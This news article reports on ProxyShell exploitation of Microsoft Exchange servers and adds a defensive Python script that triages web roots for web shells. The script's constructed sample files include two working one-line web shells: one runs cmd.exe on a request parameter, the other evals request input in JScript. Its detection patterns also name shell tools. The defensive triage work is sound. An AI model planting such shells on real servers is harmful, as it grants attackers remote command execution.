Microsoft Exchange attacked with ProxyShell flaws


The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of active exploitation attempts that take advantage of the latest set of "ProxyShell" Microsoft Exchange vulnerabilities, the fixes for which were completed in May, including the deployment of LockFile ransomware on compromised systems.

Tracked as CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207, the vulnerabilities allow an adversary to bypass ACL controls and elevate privileges on the Exchange PowerShell backend, ultimately enabling unauthenticated remote code execution. While the first two were patched by Microsoft on April 13, the fix for CVE-2021-31207 shipped as part of the Windows maker's May Patch Tuesday updates.


“An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine,” CISA said.

The development comes just over a week after cybersecurity researchers sounded the alarm about opportunistic scanning and exploitation of unpatched Exchange servers using the ProxyShell attack chain.

First demonstrated at the Pwn2Own hacking contest in April this year, ProxyShell is one of a trio of exploit chains discovered by DEVCORE security researcher Orange Tsai, alongside ProxyLogon and ProxyOracle, the latter a pair of flaws that could be abused to recover a user's password in plaintext.

"These are stolen boxes with webshells that delete other webshells and also executables that call periodically," researcher Kevin Beaumont noted last week.


According to researchers at Huntress Labs, at least five distinct styles of web shell have been observed on vulnerable Microsoft Exchange servers, with more than 100 incidents related to the exploit reported between August 17 and August 18. The web shells grant attackers remote access to the compromised servers, but it is unclear exactly what the attackers' goals are or to what extent the vulnerabilities have been used.

Over 140 web shells have been detected on as many as 1,900 unpatched Exchange servers to date, Kyle Hanslovan, CEO of Huntress Labs, tweeted, adding that "impacted [organizations] so far include building fabrication, seafood processors, industrial machinery, auto repair shops, small residential airport and more."
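Because the observed follow-on activity is dropped web shells of several styles, the first thing a defender with an unpatched or recently patched Exchange server wants is a quick triage of the IIS web root for ASP.NET handlers that were written recently and contain shell-like code. The script below is an added example written for this page; it is not Huntress Labs' tooling or anything from the article. It assumes the web root is copied to a directory you can read, uses heuristics (request input flowing into a process-spawn or `eval`, a JScript page that calls `eval`), and builds its own constructed sample tree, whose file names and contents are invented for the demonstration rather than taken from any reported incident. Treat hits as leads to review by hand, not as a verdict.

```python
"""Triage recently written ASP.NET handlers under an Exchange web root for
web-shell-like content.  Added example for illustration; heuristic only."""
import os
import re
import tempfile
import time
from datetime import datetime, timedelta

# File types IIS hands to the ASP.NET runtime as server-side code.
HANDLER_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asax"}

# Input from the HTTP request (any accessor style).
REQUEST_INPUT = re.compile(r"Request(\.Form|\.QueryString|\.Item|\.Headers|\[)", re.I)
# Primitives that turn that input into code or a process.
EXEC_PRIMITIVES = re.compile(
    r"Process\.Start|ProcessStartInfo|\beval\(|\bExecute\(|cmd\.exe|powershell", re.I)
# A JScript page calling eval() is a classic one-line shell shape.
JSCRIPT_PAGE = re.compile(r'Language\s*=\s*"?JScript"?', re.I)
EVAL_CALL = re.compile(r"\beval\(", re.I)


def classify(body: str) -> list:
    """Return the list of heuristic signals that fire on one file's contents."""
    signals = []
    if REQUEST_INPUT.search(body) and EXEC_PRIMITIVES.search(body):
        signals.append("request-input-reaches-exec")
    if JSCRIPT_PAGE.search(body) and EVAL_CALL.search(body):
        signals.append("jscript-eval")
    return signals


def scan_web_root(root: str, since: datetime) -> dict:
    """Map relative path -> signals for handlers modified at or after SINCE."""
    hits = {}
    cutoff = since.timestamp()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in HANDLER_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            if os.path.getmtime(path) < cutoff:
                continue  # untouched since before the window; skip it
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    body = fh.read()
            except OSError:
                continue
            signals = classify(body)
            if signals:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = signals
    return hits


def build_sample_tree(root: str) -> None:
    """Populate ROOT with a constructed sample: two benign pages, two shells.
    Paths and contents are invented for this example, not from any incident."""
    old = time.time() - 400 * 86400  # roughly 13 months ago
    samples = {
        # benign page, old mtime: outside the window, never read
        "owa/auth/logon.aspx": (
            '<%@ Page Language="C#" AutoEventWireup="false" %>\n'
            '<html><body><form runat="server"></form></body></html>\n', old),
        # benign page, recent mtime: read, but no signal fires
        "owa/auth/ssl.aspx": (
            '<%@ Page Language="C#" %>\n<html><body>Redirecting...</body></html>\n', None),
        # constructed shell: request parameter spawns cmd.exe
        "owa/auth/Current/themes/resources/log.aspx": (
            '<%@ Page Language="C#" %>\n'
            '<% var psi = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + Request["c"]);\n'
            '   System.Diagnostics.Process.Start(psi); %>\n', None),
        # constructed shell: JScript page evaluating request input
        "aspnet_client/system_web/shell.aspx": (
            '<%@ Page Language="JScript" %>\n<% eval(Request.Item["p"], "unsafe"); %>\n', None),
    }
    for rel, (body, mtime) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        if mtime is not None:
            os.utime(path, (mtime, mtime))


def run_demo(window_days: int = 30) -> dict:
    """Build the sample tree in a temp dir and scan the last WINDOW_DAYS."""
    root = tempfile.mkdtemp(prefix="exch-triage-")
    build_sample_tree(root)
    return scan_web_root(root, datetime.now() - timedelta(days=window_days))


if __name__ == "__main__":
    for rel_path, found in sorted(run_demo().items()):
        print(f"{rel_path}: {', '.join(found)}")
```

Run it against a real copy of the web root by calling `scan_web_root("/path/to/inetpub", datetime(...))` with a window that starts before the first exploitation attempts; the modification-time filter is only a speed-up, since an attacker can reset timestamps, so widen it or drop it once a box is confirmed compromised.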
